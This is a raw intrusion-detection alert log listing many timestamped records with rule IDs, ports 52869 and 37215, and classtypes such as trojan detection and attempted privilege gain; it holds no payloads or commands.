                      Timestamp:07/20/24-23:05:39.525196
                      SID:2027339
                      Source Port:38988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.494675
                      SID:2831300
                      Source Port:53926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.245742
                      SID:2835222
                      Source Port:58276
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.587283
                      SID:2831300
                      Source Port:34940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.612113
                      SID:2027339
                      Source Port:49458
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.312688
                      SID:2027339
                      Source Port:56742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.104627
                      SID:2025132
                      Source Port:45428
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.442743
                      SID:2831300
                      Source Port:42508
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.433337
                      SID:2025132
                      Source Port:53838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.675032
                      SID:2027339
                      Source Port:37540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.829338
                      SID:2829579
                      Source Port:54612
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.432602
                      SID:2027339
                      Source Port:44022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.961618
                      SID:2027339
                      Source Port:57998
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.979608
                      SID:2025132
                      Source Port:36636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.542495
                      SID:2831300
                      Source Port:36312
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.345455
                      SID:2025132
                      Source Port:43194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.093934
                      SID:2831300
                      Source Port:42768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.798798
                      SID:2025132
                      Source Port:38388
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.570834
                      SID:2831300
                      Source Port:50574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.453008
                      SID:2025132
                      Source Port:35574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.462432
                      SID:2831300
                      Source Port:53134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:06.144517
                      SID:2025132
                      Source Port:56320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.013302
                      SID:2831300
                      Source Port:47526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.486069
                      SID:2831300
                      Source Port:59824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.794030
                      SID:2027339
                      Source Port:33626
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.147952
                      SID:2025132
                      Source Port:57304
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:03.231512
                      SID:2831300
                      Source Port:43714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.117104
                      SID:2027339
                      Source Port:45574
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.043403
                      SID:2027339
                      Source Port:60218
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.542288
                      SID:2027339
                      Source Port:36592
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.153640
                      SID:2027339
                      Source Port:33060
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.801547
                      SID:2829579
                      Source Port:58996
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.845937
                      SID:2025132
                      Source Port:44766
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.447079
                      SID:2025132
                      Source Port:45262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.527430
                      SID:2027339
                      Source Port:59440
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:35.414252
                      SID:2027339
                      Source Port:43714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.944157
                      SID:2835222
                      Source Port:60332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.787750
                      SID:2835222
                      Source Port:41588
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.537891
                      SID:2027339
                      Source Port:49088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.224583
                      SID:2831300
                      Source Port:56824
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:04.825020
                      SID:2831300
                      Source Port:48692
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.451606
                      SID:2027339
                      Source Port:45372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.383835
                      SID:2025132
                      Source Port:34632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:11.420819
                      SID:2831300
                      Source Port:55172
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:50.501247
                      SID:2829579
                      Source Port:59166
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.996519
                      SID:2027339
                      Source Port:48192
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.424976
                      SID:2835222
                      Source Port:42740
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.807504
                      SID:2025132
                      Source Port:42032
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:27.853068
                      SID:2027339
                      Source Port:52464
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.827023
                      SID:2829579
                      Source Port:48590
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.218020
                      SID:2025132
                      Source Port:48372
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.572173
                      SID:2027339
                      Source Port:40306
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:54.322182
                      SID:2025132
                      Source Port:44418
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.163232
                      SID:2027339
                      Source Port:54468
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.113321
                      SID:2835222
                      Source Port:54880
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.266004
                      SID:2025132
                      Source Port:56724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.025297
                      SID:2025132
                      Source Port:45606
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.134757
                      SID:2027339
                      Source Port:40412
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.522256
                      SID:2829579
                      Source Port:44400
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.741345
                      SID:2027339
                      Source Port:43170
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.212762
                      SID:2027339
                      Source Port:56042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.220683
                      SID:2835222
                      Source Port:54330
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:04.068388
                      SID:2027339
                      Source Port:48116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.342606
                      SID:2027339
                      Source Port:38392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.440953
                      SID:2831300
                      Source Port:46872
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.132087
                      SID:2027339
                      Source Port:48042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.706531
                      SID:2027339
                      Source Port:59420
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:09.682183
                      SID:2025132
                      Source Port:55722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.327719
                      SID:2829579
                      Source Port:39250
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.037609
                      SID:2025132
                      Source Port:58900
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:09.635095
                      SID:2027339
                      Source Port:49064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.185323
                      SID:2027339
                      Source Port:48842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.412130
                      SID:2835222
                      Source Port:58940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:32.467103
                      SID:2025132
                      Source Port:43800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.009637
                      SID:2027339
                      Source Port:45816
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.554753
                      SID:2831300
                      Source Port:49898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.460717
                      SID:2025132
                      Source Port:38038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.106041
                      SID:2829579
                      Source Port:35042
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.558741
                      SID:2027339
                      Source Port:47000
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.468942
                      SID:2027339
                      Source Port:53194
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.090071
                      SID:2027339
                      Source Port:60322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.557906
                      SID:2831300
                      Source Port:44250
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.101729
                      SID:2829579
                      Source Port:57362
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.513646
                      SID:2027339
                      Source Port:48652
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.408822
                      SID:2025132
                      Source Port:54262
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.893579
                      SID:2025132
                      Source Port:59714
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:23.212855
                      SID:2025132
                      Source Port:52424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.662629
                      SID:2831300
                      Source Port:37124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:08.497924
                      SID:2027339
                      Source Port:39870
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.462908
                      SID:2027339
                      Source Port:48582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:13.638173
                      SID:2025132
                      Source Port:59770
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:04.222315
                      SID:2027339
                      Source Port:40936
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.198650
                      SID:2027339
                      Source Port:47354
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.086217
                      SID:2835222
                      Source Port:39928
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.412182
                      SID:2027339
                      Source Port:60988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.507185
                      SID:2027339
                      Source Port:40646
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.502632
                      SID:2831300
                      Source Port:34914
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.095402
                      SID:2027339
                      Source Port:47760
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.574959
                      SID:2835222
                      Source Port:59976
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.447932
                      SID:2831300
                      Source Port:59740
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:39.771399
                      SID:2835222
                      Source Port:38372
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.112994
                      SID:2025132
                      Source Port:58466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.419591
                      SID:2025132
                      Source Port:44972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.006350
                      SID:2831300
                      Source Port:49300
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.883933
                      SID:2025132
                      Source Port:38214
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.452253
                      SID:2027339
                      Source Port:53944
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.808887
                      SID:2835222
                      Source Port:36400
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.450834
                      SID:2027339
                      Source Port:60490
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.822356
                      SID:2027339
                      Source Port:39510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.604739
                      SID:2027339
                      Source Port:59340
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.344940
                      SID:2831300
                      Source Port:57764
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:57.832966
                      SID:2025132
                      Source Port:44326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.263525
                      SID:2027339
                      Source Port:52584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:22.982491
                      SID:2025132
                      Source Port:52202
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.245589
                      SID:2835222
                      Source Port:44872
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.853184
                      SID:2829579
                      Source Port:50818
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.762153
                      SID:2835222
                      Source Port:45754
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.354373
                      SID:2835222
                      Source Port:51534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.767395
                      SID:2835222
                      Source Port:54436
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.378138
                      SID:2027339
                      Source Port:46148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.551649
                      SID:2831300
                      Source Port:49670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:01.973350
                      SID:2027339
                      Source Port:52096
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.216845
                      SID:2027339
                      Source Port:48346
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.773442
                      SID:2829579
                      Source Port:39360
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:04.345966
                      SID:2025132
                      Source Port:39134
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:05.614115
                      SID:2831300
                      Source Port:58526
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:09.698680
                      SID:2025132
                      Source Port:37966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:08.195958
                      SID:2027339
                      Source Port:49926
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.368020
                      SID:2831300
                      Source Port:45638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.060827
                      SID:2025132
                      Source Port:46154
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.472267
                      SID:2027339
                      Source Port:55548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.382528
                      SID:2027339
                      Source Port:40634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.656192
                      SID:2835222
                      Source Port:36990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:07.493314
                      SID:2027339
                      Source Port:59114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.831807
                      SID:2835222
                      Source Port:39522
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.426493
                      SID:2027339
                      Source Port:39234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.462705
                      SID:2831300
                      Source Port:56136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.483611
                      SID:2831300
                      Source Port:45152
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:29.627964
                      SID:2025132
                      Source Port:45432
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:42.257817
                      SID:2829579
                      Source Port:42258
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.109755
                      SID:2027339
                      Source Port:40518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.972369
                      SID:2027339
                      Source Port:59252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.365807
                      SID:2831300
                      Source Port:59840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:02.606013
                      SID:2831300
                      Source Port:57536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:35.375806
                      SID:2027339
                      Source Port:52630
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.205029
                      SID:2025132
                      Source Port:34768
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.387821
                      SID:2025132
                      Source Port:41162
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:45.117900
                      SID:2027339
                      Source Port:48204
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.771399
                      SID:2835222
                      Source Port:38480
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.823104
                      SID:2027339
                      Source Port:35624
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.828884
                      SID:2829579
                      Source Port:45738
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.391415
                      SID:2025132
                      Source Port:49326
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.827209
                      SID:2829579
                      Source Port:43638
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.153687
                      SID:2027339
                      Source Port:44548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.332387
                      SID:2835222
                      Source Port:37796
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830272
                      SID:2835222
                      Source Port:50092
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.106041
                      SID:2829579
                      Source Port:48216
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.376182
                      SID:2025132
                      Source Port:35062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:41.550251
                      SID:2025132
                      Source Port:45536
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.787018
                      SID:2027339
                      Source Port:56596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.434054
                      SID:2831300
                      Source Port:34950
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:00.470172
                      SID:2025132
                      Source Port:50004
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:15.084045
                      SID:2025132
                      Source Port:42842
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.417227
                      SID:2027339
                      Source Port:52394
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.993408
                      SID:2025132
                      Source Port:59680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.022964
                      SID:2829579
                      Source Port:53632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:55.877930
                      SID:2829579
                      Source Port:43062
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.461168
                      SID:2027339
                      Source Port:42892
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.354528
                      SID:2027339
                      Source Port:52020
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.404370
                      SID:2025132
                      Source Port:56634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.960840
                      SID:2027339
                      Source Port:38410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.589035
                      SID:2025132
                      Source Port:35772
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.076848
                      SID:2831300
                      Source Port:59530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:40.439699
                      SID:2027339
                      Source Port:53366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.068340
                      SID:2027339
                      Source Port:47116
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.468125
                      SID:2027339
                      Source Port:40038
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:08.528852
                      SID:2831300
                      Source Port:43398
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:46.273107
                      SID:2027339
                      Source Port:49548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.697720
                      SID:2027339
                      Source Port:37090
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.720996
                      SID:2831300
                      Source Port:60056
                      Destination Port:52869
                      Protocol:TCP
